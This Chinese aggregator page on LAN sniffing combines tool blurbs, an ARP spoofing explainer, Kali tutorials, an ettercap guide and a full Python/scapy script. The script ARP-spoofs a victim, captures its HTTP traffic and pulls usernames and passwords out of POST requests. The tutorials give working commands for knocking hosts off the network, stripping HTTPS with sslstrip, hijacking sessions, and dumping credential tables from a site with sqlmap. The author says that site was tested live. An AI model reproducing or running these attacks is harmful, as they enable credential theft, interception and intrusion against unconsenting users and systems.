精华内容
下载资源
问答
  • 局域网嗅探工具

    2015-08-21 14:43:59
    很好用的一款局域网嗅探工具,对于查找局域网内计算机很有用处。
  • 局域网嗅探工具 软件很小 但是功能还不错
  • 用于嗅探经过网卡的信息,这个网站麻烦的很 就还要打字累!
  • 目前比较常用的局域网工具,能嗅探局域网内用户的操作。
  • 嗅探只能发生在局域网,局域网内通信是通过MAC地址寻址的,通过IP寻址在发生在局域网间的。 ARP协议,在计算机A中会...这就是局域网嗅探的原理。 ARP -a 可查看ARP表,ARP表中静态表比动态表优先级高,可通过ARP -...

    嗅探只能发生在局域网,局域网内通信是通过MAC地址寻址的,通过IP寻址在发生在局域网间的。

    ARP协议,在计算机A中会发送ARP广播来寻找通讯对象计算机B的MAC地址,如果有个计算机C,冒充双方的IP,并且把自己的MAC发送给A 和 C,就可以实现数据包转发,继而实现嗅探或监听。这就是局域网嗅探的原理。

    ARP -a 可查看ARP表,ARP表中静态表比动态表优先级高,可通过ARP -s ip mac绑定静态表。

    原理图

     

    超级嗅探狗(WFilter Free)

    http://www.itt7.com/index.php/archives/47/

    https://www.secpulse.com/archives/6068.html

     还在学习中,没有调试出想要的效果。

    转载于:https://www.cnblogs.com/yaochc/p/6034505.html

    展开全文
  • 无线局域网嗅探工具

    千次阅读 2019-05-14 09:43:26
    #无线局域网黑客工具 from scapy.all import * import os import time import re from threading import Thread #获取上网的ip和网关 route=os.popen("route print").read() #route print 命令显示本机的路由表 ...
    #无线局域网黑客工具
    from scapy.all import *
    import os
    import time
    import re
    from threading import Thread
    
    #获取上网的ip和网关
    route=os.popen("route print").read()        #route print 命令显示本机的路由表
    gateway,ip=re.search(r"0\.0\.0\.0\s+0\.0\.0\.0\s+(\S+)\s+(\S+)",route).groups()
            #seach匹配一次,groups函数将所有匹配结果都取出,group函数的区别
    print("本机ip:",ip)
    print("上网网关:",gateway)
    rdict={}
    
    #在局域网内进行主机发现
    def scan():
        global rdict        #使用全局变量rdict
        IpScan = ip+"/24"
        print("扫描中,请稍候...")
        ans,unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=IpScan),timeout=2,verbose=0,iface="Intel(R) Wireless-AC 9462")
        print("本次扫描一共扫描到%d台主机:" % len(ans))
        for send,recv in ans:
            print("%s----%s"%(recv.src,recv.psrc))
            rdict[recv.psrc] = recv.src 
    def cap(ip,tc):
        pkts=sniff(iface="Intel(R) Wireless-AC 9462",filter=f"tcp port 80 and src host {ip}",timeout=tc)
        wrpcap("demo.pcap",pkts)
        print("攻击完成!")
    def spoof():
        vict=input("要攻击的ip:")
        st=int(input("攻击时间(秒):"))
        t=Thread(target=cap,args=(vict,st))
        t.start()
        for i in range(st*5):
            sendp(Ether(dst=rdict[vict])/ARP(pdst=vict,psrc=gateway),verbose=0,iface="Intel(R) Wireless-AC 9462")        
            #pdst=vict,psrc=gateway ,这里将源地址改为网关地址,用来欺骗目标主机,让它认为我是网关
            #sendp(Ether(dst=rdict[gateway])/ARP(pdst=gateway,psrc=vict),verbose=0,iface="Intel(R) Wireless-AC 9462")
            time.sleep(0.2)     #每隔两秒发送一次欺骗包
            
    def mima():     #对获取的数据进行分析(可以更改过滤条件来分析不同的数据包)
        pkts=rdpcap("demo.pcap")
        for p in pkts:
            if p.haslayer(IP) and p.haslayer(Raw):  #取出每一个含有原始数据的IP数据包
                try:
                    inf=p.load.decode(errors="ignore")  #取出数据包里的p.load字段数据
                    if inf.startswith("POST"):      #判断数据是否以POST方式提交
                        url=re.findall(r"Referer: (.+)",inf)    #取出所有Referer字段后的网址
                        if url:
                            print(time.ctime(p.time))   #用p.time取出p中的时间字段,time.ctime以我们能看懂的格式输出
                            print(url[0])
                            print("用户名:",re.search(r"[uU]serName=(.+?)&",inf).group(1)) #用正则表达式取出需要的信息
                            print("密码:",re.search(r"[pP]assWord=([^&]+)",inf).group(1))
                except Exception as e:
                    print(e)
                    pass
    def main():
        while 1:
            print("功能列表:")
            print("1 局域网扫描")
            print("2 ARP攻击")
            print("3 密码分析")
            print("4 退出")
            while 1:
                sel=input("你的操作:")
                if sel in list("1234"):
                    break
                print("输入有误!")
            if sel=="4":
                exit()
            elif sel=="1":
                scan()
            elif sel=="2":
                spoof()
            else:
                mima()
        print("再见!")
    if __name__=="__main__":
        main()
    
    展开全文
  • 局域网嗅探rawsniffer

    2009-03-25 12:16:05
    局域网嗅探rawsniffer工具,最快,最好
  • kali 局域网嗅探

    千次阅读 2018-10-02 21:09:00
    1、局域网图片嗅探 工具 arpspoof arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网扫描工具 Advanced ip Scanner linux中 扫描局域网在线的主机 ...

    1、局域网图片嗅探

         工具  arpspoof

          arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网扫描工具  Advanced ip Scanner

            linux中 扫描局域网在线的主机 fping -asg 192.168.1.0/24 

                        
            欺骗的同时不能是对方断网,使用流量转发  echo 1 >/proc/sys/net/ipv4/ip_forward   

            检查是否成功执行     cat  proc/sys/sys/net/ipv4/ip_forward          
                         获取本机网卡的图片   driftnet -i eth0

    2、密码嗅探 <http>

           先使用欺骗命令 arpspoof

             ettercap -Tq - i eth0

       

    3、ssh远程连接操作  链接kali  shell模式注销

         ctrl +Alt +F1   切换到 命令行模式

          使用命令   /etc/init.d/ssh  start

          使用Xshell 链接kali ip

    4、抓包https流量

         首先编辑    vim /etc/ettercap/etter.conf   修改  ****linux **  取消 #

        开启 sslstrip -a -f -k

         开启欺骗  arpspoof  同时转发流量 

       在https 网址上进行登陆 抓取流量

     5、会话劫持登陆已经被别人登陆的网站

        快速添加之前使用的命令  ! + 部分命令  就会补全

        先使用arpspoof 欺骗 同时流量转发

        使用 wireshark 流量抓包工具

         使用 ferret 重新生成抓包的工具

         ferret  -r  j加上 抓取的流量包  会生成一个 txt文件

        使用 hamster  -h打开一个浏览器        -----》 设置代理和端口   

        或者不适用欺骗,直接使用 ferret -i eth0  然后使用 hamster  浏览网页  

        另外基于界面的软件 cookieCadger

    6、sqlmap 对asp网站的检测

          sqlmap -u "www.baidu.com.id=2" 

           sqlmap -u "www.baidu.com.id=2"   --tables

           sqlmap -u "www.baidu.com.id=2"     --columns -T  "user"

             sqlmap -u "www.baidu.com.id=2"  --dump  -C "username ,password" -T "user"

        cookie使用     sqlmap -u “  www.baidu.com.php.id=2”   --cookie "id=23" --level=2

         

    7、sqlmap 对php网站的检测

           sqlmap -u “  www.baidu.com.php.id=2”  --is-dba   检测是否是dba 形式  (可以将文件写入目录)

            sqlmap -u “  www.baidu.com.php.id=2”  --dbs   (列出所有的数据库)

          sqlmap -u “  www.baidu.com.php.id=2”   --current-db     (猜测当前的数据库)

            sqlmap -u “  www.baidu.com.php.id=2”  --tables -D "admin"   (根据admin数据库猜测表名)

             sqlmap -u “  www.baidu.com.php.id=2”   --columns -T "pss"  -D "admin"

             sqlmap -u “  www.baidu.com.php.id=2”  --dump  -C "username,password " -T "pss"  -D "admin"

    8、实例检测

       下面是我检测的一个网上的PHP的网站 存在SQL注入的漏洞

    9、Metasploit

         msfconsole

         这一节我之前的微博已经写过很多,不过还没哟整理,想着抽空整理一遍

       

        

    10、流量分析工具 nload

            附: 卸载之前暗转的软件 apt-get remove 

                 修复没有成功安装的软件   apt --fix-broken install

    11、metasploit

        使用Metasploit 辅助模块 wmap进行扫描(对网站进行集中的扫描)

        使用Sqlmap辅助模块进行扫描:

     

          

       

       

     

     

     

        

        

         

     

       

     

    转载于:https://www.cnblogs.com/xinxianquan/p/9735720.html

    展开全文
  • ettercap 局域网嗅探

    千次阅读 2018-10-30 21:52:11
    本次嗅探试验所使用到的工具有两个,ettercap和driftnet。 ettercap是一款现有流行的网络抓包软件,他利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务器之间充当中间人,嗅探两者之间的数据流量...

    背景知识

    本次嗅探试验所使用到的工具有两个,ettercap和driftnet。 ettercap是一款现有流行的网络抓包软件,他利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务器之间充当中间人,嗅探两者之间的数据流量,从中窃取用户的数据资料。

    ettercap的介绍

    ettercap有两种运行方式,UNIFIED和BRIDGED。UNIFIED的方式是以中间人方式嗅探,基本原理是同时欺骗主机A和B,将自己充当一个中间人的角色,数据在A和B之间传输时会通过C,C就可以对数据进行分析,从而完成嗅探。BRIDGED方式是在双网卡情况下,嗅探两块网卡之间的数据包。

    ettercap的sniffing工作方式划分为五种:

    1)IPBASED:在基于IP地址的sniffing方式下,ettercap将根据源IP-PORT和目的IP-PORT来捕获数据包;

    2)MACBASED:在基于MAC地址的方式下,ettercap将根据源MAC和目的MAC来捕获数据包(在捕获通过网关的数据包时,该方式很有用);

    3)ARPBASED:在基于Arp欺骗的方式下,ettercap利用Arp欺骗在交换局域网内监听两个主机之间的通信(全双工);

    4)SMARTARP:在SMARTARP方式下,ettercap利用Arp欺骗,监听交换网上某台主机与所有已知的其他主机(存在于主机表中的主机)之间的通信(全双工);

    5)PUBLICARP:在PUBLICARP 方式下,ettercap利用Arp欺骗,监听交换网上某台主机与所有其它主机之间的通信(半双工)。此方式以广播方式发送Arp响应,但是如果 ettercap已经拥有了完整的主机地址表(或在ettercap启动时已经对LAN上的主机进行了扫描),ettercap会自动选取 SMARTARP方式,而且Arp响应会发送给被监听主机之外的所有主机,以避免在Windows主机上出现IP地址冲突的消息。

    在操作ettercap时,常使用-M参数,即选择中间人攻击模式,有如下几种攻击方式:

    1)基于Arp毒化的中间人攻击:Arp毒化的原理可简单理解为伪造MAC地址与IP的对应关系,导致数据包由中间人截取再转手发出。Arp毒化有双向(remote)和单向(oneway)两种方式。双向方式将对两个目标的Arp缓存都进行毒化,对两者之间的通信进行监听。而单向方式只会监听从第一个目标到第二个目标的单向通信内容。一般会选择使用双向欺骗的方式来获取所有的数据包进行嗅探分析。

        如:#ettercap -M arp:remote /192.168.1.102//  

        对应的含义是:表示对192.168.1.102的所有端口的通信进行嗅探,包括其发出的数据包和收到的数据包。

    2)icmp欺骗:icmp欺骗即基于重定向(redirect)的路由欺骗技术。其基本原理是欺骗其他的主机,将自身伪装为最近的路由,因此其他主机会将数据包发送过来,然后作为中间人的攻击者再重新将其转发到真正的路由器上。于是我们便可以对这些数据包进行监听。当然,icmp欺骗不适用于交换机的环境,若本机在交换机的环境下则最好选择arp毒化的方式来进行攻击。icmp欺骗方式的参数是真实路由器的MAC和IP,参数形式为(MAC/IP)。

      ettercap参数及常用操作

        -l  显示可用网卡接口设备
        -i  选择接口
        -t  协议选择,tcp/udp/all,默认为all
        -p  不进行毒化攻击,用于嗅探本地数据包
        -L 载入过滤器文件
        -V  text 将数据包以文本形式显示在屏幕上
        -L  filename 把所有的数据包保存下来(保存后的文件只能用etterlog显示)

    driftnet的介绍

    driftnet是一款用于抓取指定接口数据流上面图片的软件,并且把嗅探到的图片显示在Linux下的一个窗口当中。

    driftnet命令的使用语法:driftnet   [options]  [filter code]

    主要参数:

    -b             捕获到新的图片时发出嘟嘟声

    -i  interface     选择监听接口

    -f  file         读取一个指定pcap数据包中的图片

    -p             不让所监听的接口使用混杂模式

    -a             后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)

    -m number     指定保存图片数的数目

    -d directory     指定保存图片的路径

    -x prefix        定保存图片的前缀名

    局域网断网

    在终端输入命令先ping 出你要想断网的ip

    fping --asg 192.168.4.1/24(我的)

    然后 输入命令  arpspoof -i eth0 -t 192.168.4.159 192.168.4.4

    192.168.4.159 是攻击的目标ip 192.168.4.4 是攻击者的网关

    局域网获取图片

    首先先打开一个终端 输入

    makdir ls  创建一个文件 ,driftnet -i eth0 -b -a -d  /root/ls  接绝对路径

    然后另外开启一个终端输入 ettercap -i eth0 -Tq -M arp:remote /// ///

    这是对局域网的所有ip进行嗅探

    展开全文
  • 局域网查看嗅探工具

    2011-11-18 10:31:55
    一款局域网查看管理软件,免安装方便实用。
  • 局域网嗅探

    2006-03-16 00:00:00
    3、DetectSniff----检测局域网内是否存在嗅探器的工具 4、DNSMonitor----监听局域网内DNS查询包的工具 5、KickIP----局域网IP冲突发生器,可以暂时断开某个IP 6、Transfer----局域网IP转接工具,可以将两台原先...
  • 简易小巧 而功能实用的局域网工具,有嗅探 发送数据包功能
  • 第一章 需求分析 1.1 设计目的 1.1.1 基本要求 ... 能够解析本地或局域网的数据包,例如TCP包,UDP包,工CMP包等,能分析报头以及数据包内容 能分析数据包的版本、头长度、服务类型、数据包总长度、...
  • 远控网络刺客II 最牛的查局域网嗅探器 绿色版(不要做坏事) ... 如果你没有连上互联网或者不想注册,可以点按窗口下边的“稍后”按钮,先感受一下网络刺客的神奇功能。 网络刺客II的界面如图所示,笔者以Windows 98...
  • 一款集局域网入侵查看嗅探为一身的强大软件,破解版的。
  • 第一章 需求分析 1.1 设计目的 1.1.1 基本要求 完成一个基于Libpcap的网络数据包解析软件,... 能够解析本地或局域网的数据包,例如TCP包,UDP包,工CMP包等,能分析报头以及数据包内容 能分析数据包的版本...
  • arpsf嗅探工具.里面有使用说明..可以嗅探局域网的密码 还能DNS挂马
  • 局域网查看工具(LanSee)是一款对局域网上的各种信息进行查看的工具。它集成了局域网搜索功能,可以快速搜索出计算机(包括计算机名,IP地址,MAC地址,所在工作组,用户),共享资源,共享文件;集成了网络嗅探...

空空如也

空空如也

1 2 3 4 5 ... 14
收藏数 276
精华内容 110
关键字:

局域网嗅探工具